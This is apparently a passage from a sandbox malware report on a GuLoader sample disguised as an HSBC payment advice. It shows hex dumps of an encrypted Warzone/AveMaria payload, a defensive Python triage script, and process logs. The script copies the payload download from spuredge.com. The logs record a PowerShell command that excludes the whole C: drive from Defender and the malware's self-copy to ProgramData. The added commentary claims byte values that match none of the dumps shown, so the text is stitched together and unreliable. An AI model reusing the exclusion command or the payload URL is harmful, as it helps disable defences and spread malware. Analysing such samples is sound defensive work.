                  2021-11-25 17:53:00 UTC137INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:53:01 UTC145INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
                  2021-11-25 17:53:01 UTC152INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:53:01 UTC160INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:53:01 UTC168INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:53:01 UTC176INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:53:01 UTC184INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:53:01 UTC191INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:53:01 UTC199INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:53:01 UTC207INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:53:01 UTC215INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:53:01 UTC223INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC
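
The exchange above is the loader fetching its encrypted stage, and it is worth noting that both sessions returned byte-identical bodies (the first raw chunk starts 90 31 03 cf in each). The script below is an added example, not part of the Joe Sandbox report: it takes the request, the response headers and the first 255 body bytes exactly as the capture shows them, together with the owning process from the session row, and scores the download the way a proxy or EDR content rule would. The rule names, the 6.5 bits/byte entropy threshold and the verdict strings are the author's assumptions; the IE11 User-Agent and the non-PE, high-entropy body are what the capture actually shows.

```python
"""Triage of the payload download recorded above. Added example, not part of the
Joe Sandbox report: request, response head and first 255 body bytes are copied
from the capture; the scoring rules and thresholds are assumptions."""
import math

# Copied from the report: the GET issued by HSBC Payment Advice.exe and the reply.
REQUEST = (
    "GET /warzone_JBBOxCEy72.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: spuredge.com\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
RESPONSE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 25 Nov 2021 17:53:00 GMT\r\n"
    "Server: Apache\r\n"
    "Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 115776\r\n"
    "Connection: close\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
)
# First "Data Raw" chunk of the body, copied from the report (identical in both sessions).
FIRST_CHUNK = bytes.fromhex("".join("""
90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19
7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52
10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d
0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0
3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73
53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9
cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2
52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
""".split()))
# Owner of the socket, from the session row.
PROCESS = r"C:\Users\user\Desktop\HSBC Payment Advice.exe"


def parse_head(text):
    """Return (start line, {lowercased header name: value}) for a request or response head."""
    lines = text.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def shannon_entropy(data):
    """Bits per byte. Random or encrypted data sits near 8 (about 7.2 for a 256-byte
    sample); text is around 4.5; a PE header with its zero padding is lower still."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(request, response_head, body_head, process):
    """Score one HTTP download; thresholds and labels are the author's assumptions."""
    req_line, req = parse_head(request)
    _status, resp = parse_head(response_head)
    method, path, _version = req_line.split(" ", 2)
    findings = []

    ctype = resp.get("content-type", "")
    if ctype == "application/octet-stream" and path.lower().endswith(".bin"):
        findings.append("opaque .bin served as application/octet-stream")

    # "Trident/7.0 ... rv:11.0" is Internet Explorer 11's UA string; only iexplore.exe
    # should send it, so any other image presenting it is impersonating the browser.
    ua = req.get("user-agent", "")
    if "Trident/7.0" in ua and "rv:11.0" in ua and not process.lower().endswith("iexplore.exe"):
        findings.append("IE11 User-Agent from non-browser process")

    if req.get("cache-control", "").lower() == "no-cache":
        findings.append("Cache-Control: no-cache (forces a fresh copy from origin)")

    is_pe = body_head.startswith(b"MZ")
    entropy = shannon_entropy(body_head)
    if not is_pe and entropy > 6.5:
        findings.append(f"body is not a PE and has {entropy:.2f} bits/byte: encrypted or packed stage")

    encrypted_stage = not is_pe and entropy > 6.5 and ctype == "application/octet-stream"
    return {
        "method": method,
        "host": req.get("host"),
        "path": path,
        "length": int(resp.get("content-length", "0")),
        "entropy": round(entropy, 2),
        "findings": findings,
        "verdict": "encrypted second-stage download" if encrypted_stage else "review",
    }


if __name__ == "__main__":
    result = triage(REQUEST, RESPONSE_HEAD, FIRST_CHUNK, PROCESS)
    print(f"{result['verdict']}: http://{result['host']}{result['path']} ({result['length']} bytes)")
    for finding in result["findings"]:
        print(" -", finding)
```

Entropy on its own is not proof of anything (a zip or a JPEG scores just as high); the signal here is the combination of an opaque .bin served as octet-stream, a body that is not a PE, and a browser User-Agent coming from a process that is not a browser. On a proxy the same logic would key on host and path first and on the hash of the fully carved body second.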


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time: 18:48:50
                  Start date: 25/11/2021
                  Path: C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase: 0x400000
                  File size: 111776 bytes
                  MD5 hash: A069E61B357F625A7B3595150412C42D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation: low

                  General

                  Start time: 18:49:51
                  Start date: 25/11/2021
                  Path: C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase: 0x400000
                  File size: 111776 bytes
                  MD5 hash: A069E61B357F625A7B3595150412C42D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation: low

                  General

                  Start time: 18:50:50
                  Start date: 25/11/2021
                  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit): true
                  Commandline: powershell Add-MpPreference -ExclusionPath C:\
                  Imagebase: 0x1110000
                  File size: 430592 bytes
                  MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: .Net C# or VB.NET
                  Reputation: high

                  General

                  Start time: 18:50:50
                  Start date: 25/11/2021
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff774ee0000
                  File size: 625664 bytes
                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time:18:50:51
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 56%, Virustotal, Browse
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 49%, ReversingLabs
                  Reputation:low

                  General

                  Start time:18:51:59
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low
